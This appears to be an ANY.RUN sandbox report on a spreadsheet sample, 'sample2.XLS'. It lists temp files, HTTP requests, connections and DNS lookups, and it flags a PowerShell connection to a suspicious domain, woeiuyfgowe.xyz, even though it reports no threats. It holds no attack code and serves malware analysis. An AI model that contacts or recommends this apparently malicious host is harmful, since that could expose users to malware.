1020EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF169BA7242E4DE96B.TMP
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFF78A73433917DBED.TMP
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF0EE690CFE9221897.TMP
MD5:
SHA256:
3756powErsHell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2uf1futw.wiv.ps1
MD5:
SHA256:
3756powErsHell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x4cyz2wq.kaw.psm1
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF5D4FE50DC5F602D3.TMP
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF22891B1A824CBA16.TMP
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF2ADE026E654A8591.TMP
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
MD5:
SHA256:
1020EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
19
TCP/UDP connections
15
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1020
EXCEL.EXE
GET
200
13.107.3.128:443
https://config.edge.skype.com/config/v1/Office/16.0.11328.20158?&Clientid=%7b082078A9-BB8F-421B-9363-C2C17BA0E563%7d&Application=excel&Platform=win32&Version=16.0.11328.20158&MsoVersion=16.0.11328.20156&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7b34B3791D-FFEE-48F4-AC89-FE068DB4E036%7d&LabMachine=false
US
text
60.2 Kb
whitelisted
POST
200
40.90.23.223:443
https://login.live.com/RST2.srf
US
xml
11.2 Kb
whitelisted
POST
200
40.90.23.223:443
https://login.live.com/RST2.srf
US
xml
11.2 Kb
whitelisted
1020
EXCEL.EXE
GET
200
52.109.32.27:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1040&uilcid=1033&build=16.0.11328&crev=3
GB
xml
103 Kb
whitelisted
POST
200
40.90.23.223:443
https://login.live.com/RST2.srf
US
xml
9.83 Kb
whitelisted
1628
svchost.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
1628
svchost.exe
GET
200
2.16.186.120:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
unknown
der
550 b
whitelisted
1628
svchost.exe
GET
200
2.16.186.120:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
der
555 b
whitelisted
POST
200
40.90.23.223:443
https://login.live.com/RST2.srf
US
xml
9.83 Kb
whitelisted
1020
EXCEL.EXE
GET
200
52.109.76.31:443
https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.11328.20158&ClientId=%7b082078A9-BB8F-421B-9363-C2C17BA0E563%7d&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.11328.20158&
IE
xml
303 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1020
EXCEL.EXE
52.114.75.78:443
self.events.data.microsoft.com
Microsoft Corporation
NL
unknown
1020
EXCEL.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
3756
powErsHell.exe
185.158.249.75:443
woeiuyfgowe.xyz
easystores GmbH
NL
suspicious
40.90.23.223:443
login.live.com
Microsoft Corporation
US
unknown
1628
svchost.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1628
svchost.exe
2.18.233.62:80
www.microsoft.com
Akamai International B.V.
whitelisted
1628
svchost.exe
2.16.186.120:80
crl.microsoft.com
Akamai International B.V.
whitelisted
1020
EXCEL.EXE
52.109.32.27:443
officeclient.microsoft.com
Microsoft Corporation
GB
whitelisted
1020
EXCEL.EXE
52.109.76.31:443
nexusrules.officeapps.live.com
Microsoft Corporation
IE
whitelisted
3164
SystemSettings.exe
152.199.19.161:443
onecs-live.azureedge.net
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.90.23.223
  • 40.90.23.211
  • 40.90.23.213
whitelisted
self.events.data.microsoft.com
  • 52.114.75.78
whitelisted
config.edge.skype.com
  • 13.107.3.128
whitelisted
woeiuyfgowe.xyz
  • 185.158.249.75
suspicious
nexusrules.officeapps.live.com
  • 52.109.76.31
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
crl.microsoft.com
  • 2.16.186.120
  • 2.16.186.74
whitelisted
www.microsoft.com
  • 2.18.233.62
whitelisted
officeclient.microsoft.com
  • 52.109.32.27
whitelisted
onecs-live.azureedge.net
  • 152.199.19.161
whitelisted

Threats

No threats detected
Process
Message
EXCEL.EXE
2019-07-17 08:17:23.664 T#684 <E> [AriaSDK.PAL] PAL is already shutdown!
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
sample2.XLS